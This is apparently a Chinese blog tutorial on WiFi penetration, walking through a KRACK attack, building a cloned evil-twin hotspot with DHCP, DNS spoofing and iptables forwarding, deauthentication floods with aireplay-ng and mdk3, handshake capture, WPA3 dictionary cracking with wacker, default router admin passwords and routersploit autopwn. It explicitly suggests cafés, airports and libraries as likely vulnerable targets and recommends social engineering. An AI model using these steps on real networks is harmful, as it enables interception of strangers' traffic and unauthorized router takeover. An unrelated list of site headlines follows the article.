WiFi无线渗透测试及KRACK攻击的步骤总结

0x00 进行渗透时需知晓的基础知识
1.wpa2:是wpa的升级版,是针对保护无线网络安全而设计的无线网络保护系统,引入了psk(预共享密钥模式)秘钥,加强了wpa的不足之处,但是因为使用了psk,所以只要攻击者知晓目标的psk秘钥,就能十分轻易加入无线网络。
2.wpa3:是近几年新出现的无线网络安全保护系统,在wpa2的基础上实现了针对字典法暴力密码破解的难度,如果失败次数过多,ap将直接锁定攻击行为,以及取代了psk使用对等实体验证(sae)
3.ap:特指无线网络接入点,就是路由器等设备的广泛称呼
ps.实现无线网络攻击一般都需要两张或更多网卡,有时候也需要一些社工手段!购买无线网卡强烈建议购买支持802.11ac协议的网卡!!!
0x01 wpa2渗透思路
如果实在嫌跑密码的进度过慢或者没有好的字典,可以试一试wpa2的秘钥重装攻击(krack)
ps.本文所用的方法绝大部分没有使用大佬提供的poc,旨为了能够完全细化并理解krack攻击的步骤
0x02 秘钥重装攻击复现步骤:
秘钥重装攻击(krack):
此攻击针对wpa2协议中创建一个nonce(一种共享密钥)的四次握手。
0x03 krack的原理:
wpa2的标准预期有偶尔发生的wi-fi断开连接,并允许使用同样的值重连第三次握手,以做到快速重连和连续性。因为标准不要求在此种重连时使用不同密钥,所以可能出现重放攻击。
攻击者还可以反复重发另一设备的第三次握手来重复操纵或重置wpa2的加密密钥。每次重置都会使用相同的值来加密数据,因此可以看到和匹配有相同数据的块,识别出被加密密钥链的数据块。随着反复的重置暴露越来越多的密钥链,最终整个密钥链将被获知,攻击者将可读取目标在此连接上的所有流量。
wpa2通常用于移动设备至固定接入点或家庭路由器的连接,尽管某些流量本身可能被ssl/tls等协议加密,但风险仍十分严重。(资料来自百度百科)
1.启动网卡的混杂模式
sudo airmong-ng start
2.对目标ap进行信息收集
先用
sudo airodump-ng
3.找到目标ap的bssid
这是我家中的2.4g无线网络,第一个使用桥接模式桥接了cmcc,因为两个路由器都已经安装了最新的固件把秘钥重装漏洞修复了,所以该次实验不会对我的路由器与设备造成损伤或是成功渗透,但是针对现实中像是咖啡店、机场、图书馆类的场景,路由器的固件很有可能并没有升级到最新版本,所以该攻击可能依然有效
4.锁定目标bssid后,使用
sudo airodump-ng --bssid=
5.嗅探该ap中的所有成员
如果没有成员的话可以插拔一下网卡(我才不会因为在复现过程中没看到网卡关闭等了十几分钟这件事说出来)
6.克隆wi-fi钓鱼热点
需要伪造一个同名,同mac地址的钓鱼热点
更改网卡mac地址步骤:
sudo ifconfig device2 downsudo macchaner device2 -m //注意,请将这里的newmac更改为目标ap点的mac地址sudo ifconfig device2 up 伪造热点:
sudo airmong start wlan2 //开启网卡的监听模式sudo airbase-ng -e -c //讲trget ssid更改为目标ssid,并且channel更改成不同的信道sudo ifconfig at0 up //启动虚拟网关sudo vi /etc/network/interfaces------------------------------//配置虚拟网卡地址参数auto at0iface at0 inet staticaddress 192.168.199.1 //这里最好与目标ap点的管理页面一样netmask 255.255.255.0------------------------------sudo service networking restart //重启网卡服务ifconfig at0查看at0网卡,如果没有ip地址或者不存在,重试以上步骤,注意!必须先使用airbase-ng创建ap点,at0网卡才会被可用! 配置dhcp:
sudo vi /etc/dhcp/dhcpd.conf设置子网 掩码 分配地址范围等在里面添加:subnet 192.168.199.0 netmask 255.255.255.0{ range 192.168.199.100 192.168.199.150; option routers 192.168.199.1; option subnet-mask 255.255.255.0; option domain-name-servers 192.168.178.99; //注意这里的doamin地址需要自己更换}
进入下一配置文件,将at0指定为dhcp请求网卡
sudo vi /etc/default/isc-dhcp-server将其中的interfacesv4=更改为interfacesv4=at0
sudo service isc-dhcp-server restart //重启dhcp服务
配置dnsmasq
sudo vi /etc/dnsmasq.conf添加以下内容:resolv-file=/etc/resolv.conf //设置resolv目录strict-orderlisten-address=192.168.199.113 //这个ip是本机ip,如果只想本地访问可以填写127.0.0.1address=/baidu.com/192.168.178.99 //注意,这一步很重要,需要在这里设置泛解析address=/111.com/220.181.38.148server=8.8.8.8 //设置谷歌dns为首选dnsserver=114.114.114.114sudo vi /etc/resolv.conf添加nameserver为本机ip地址
重启dnsmasq服务
sudo service dnsmasq restart
设置iptables进行流量转发:
//使用iptables编写规则:iptables -t nat -a postrouting -s 192.168.199.0/24 -j snat --to 192.168.178.99iptables -t nat -a postrouting -o eth0 -j masquerade//对eth0进行源natiptables -a forward -i wlan1 -o eth0 -j accept//转发能上网的无线网卡流量iptables -a forward -p tcp --syn -s 192.168.199.0/24 -j tcpmss --set-mss 1356iptables-save //保存 克隆wi-fi后成功获取到成员进入网络提示信息
7.但是我们也不能白等新的冤大头连上我们的热点,所以我们可以对目标ap的成员使用断网攻击使其强制掉线重连
aireplay-ng攻击:
//先对目标ap进行锁定监听并保存抓到的握手包sudo airodump-ng --bssid= --channel= -w //然后打开一个新的命令窗口进行攻击sudo aireplay-ng -0 0 -a -c mdk3/mdk4攻击:
vi blacklist //创建一个黑名单文件,并且把目标的bssid填进去sudo mdk3 d -s 1000 -b blacklist.txt -c //执行攻击//mdk4同理,只需要把mdk3换成mdk4 稍等一会后,所有目标均已离线,2.4gap网络用户断网连接后一般来说都可以直接获取到握手包
8.获取四次握手的数据包
当左上角出现:
就说明我们拿到了握手包
接着打开wireshak,将上一步的01号数据包到wireshark打开搜索字符串message
需要找到
然后右键选择标记分组
之后选择左上角文件->导出特定分组->选择仅选中分组
保存第三条握手包
7.实行攻击
(因为我这硬件条件实在不允许,就说一下实行攻击 的具体步骤,并且贴出大佬的poc吧)
(1)使用scapy伪造含有csa(信道切换公告)信标的beacon管理帧,使成员强制连接到钓鱼热点
csa信息元素:
(2)向成员设备发送3号握手包多次,并允许1、2号握手包通过,阻断4号握手包使其强制安装秘钥
在此演示使用scapy发送三号握手包
sudo scapy //打开scapy
在wireshark中我们可以看到message 3 of 4被成功重传
攻击完成,攻击者打开wireshark监听,可以发现成员在目标ap内浏览的所有tcp明文
wpa3攻击思路
因为dragonblood漏洞组并没有公布相关的攻击方式与poc,所以这一节我们来了解一下我在github上找的一个wpa3在线字典攻击工具----wacker
在使用工具前,我们需要先编译作者自改的wpa_supplicant
首先下载工具
git clone https://github.com/blunderbuss-wctf/wacker.git
cd wacker
apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-devcd wpa_supplicant-2.8/wpa_supplicant/cp defconfig_brute_force .configmake -j4ls -al wpa_supplicant//执行玩上述步骤以构建wpa_supplicant后,我们就可以正常使用工具了 split.sh是用来为多个网卡进行分配破解工作而进行生成单次列表
使用:sudo ./split.sh
wacker.py是程序本体
使用方法与选项:
--wordlist 指定使用的字典--interface 指定使用的设备--bssid 指定目标的bssid--ssid wpa3的ssid--freq ap的频率--start 从单词列表中的指定字符开始--debug 输出debug信息--wpa2 使用wpa2模式
使用例:
社会工程学/密码泄露手段
俗话说得好,当你不知道的时候建议直接去问,这也同样适用直接询问wi-fi密码
还有一种手段那就是直接使用wi-fi万能钥匙等这种密码泄漏工具,使用手机自带的生成wi-fi二维码功能,再配合扫码就能直接得到密码。
路由器后台渗透思路
在进入无线局域网后,我们可以对无线路由器的后台进行渗透,渗透后台的方法包括但不限于:漏洞、跑包、弱密码,后台密码很大概率会与wi-fi密码相同
这里贴出一些常用路由器的默认后台账号密码:
tp_link家用路由器:admin-admintp_link企业级路由器:admin-admin123456或admin-123456admintenda路由器:admin-admin360路由器:admin-admin华为路由器:admin-adminnetcore路由器:guest-guest小米:没密码fast路由器:admin-admind-link路由器:admin-adminphicomm路由器:admin-admin漏洞渗透思路: 谈到对路由器的漏洞攻击手段,不得不提到大名鼎鼎的routersploit
routersploit项目地址//github.com/threat9/routersploit.git
routersploit的安装(kali下):
git clone https://github.com/threat9/routersploit.gitcd routersploitpip3 install -r requirements.txt routersploit的使用:
sudo ./rsf.py //开启routersplotuse scanners/autopwn //执行自动扫描模块show option //查看设置
set target run //启动扫描
耐心等待扫描结束,如果该漏洞对路由器有效的话,会直接列出来,如果可能对该路由器有用会列出可能有效的漏洞
作者:tug0u_fenr1r


PCB走线,不是盲目的拉线
红米新机RedmiGo获得泰国NBTC认证 将在印度上市发售预计价格低于红米6A
低成本激光位移传感器ZLDS10X系列用于火车铁轨轮廓、铁轨振动检测
高密度有源EMI滤波器QuietPower QPI-21的作用及设计应用
魅族Pro7什么时候上市?魅族Pro7邀请函曝光,寓意颇深,双屏功能是鸡肋还是创新,魅族玩脱了?
WiFi无线渗透测试及KRACK攻击的步骤总结
连接器焊锡有气泡的原因是什么
Qualcomm Clear Sight双摄技术:让手机拍出惊艳照片
浅谈微控制器产品的市场营销
英特尔携手合作伙伴致力于物联网领域为各行业带来商机
冲床安全保护器原理_冲床安全保护线路图
小米6发布说好的虹膜识别呢?没有现货?
Python的发展前景及工作
可穿戴设备在医疗市场领域前景可期
腾讯极光盒子4C拆解,国产芯片涉猎很广
租用服务器前必须知道的DDoS及其原理
Pixelworks第五代视觉处理器 给黑鲨3带来了沉浸式的游戏体验
是德/keysight有源探头产品介绍
CANape可以同时监控CAN总线数据和某个ECU中变量值吗?
物联网卡和普通SIM卡各自有什么不一样的地方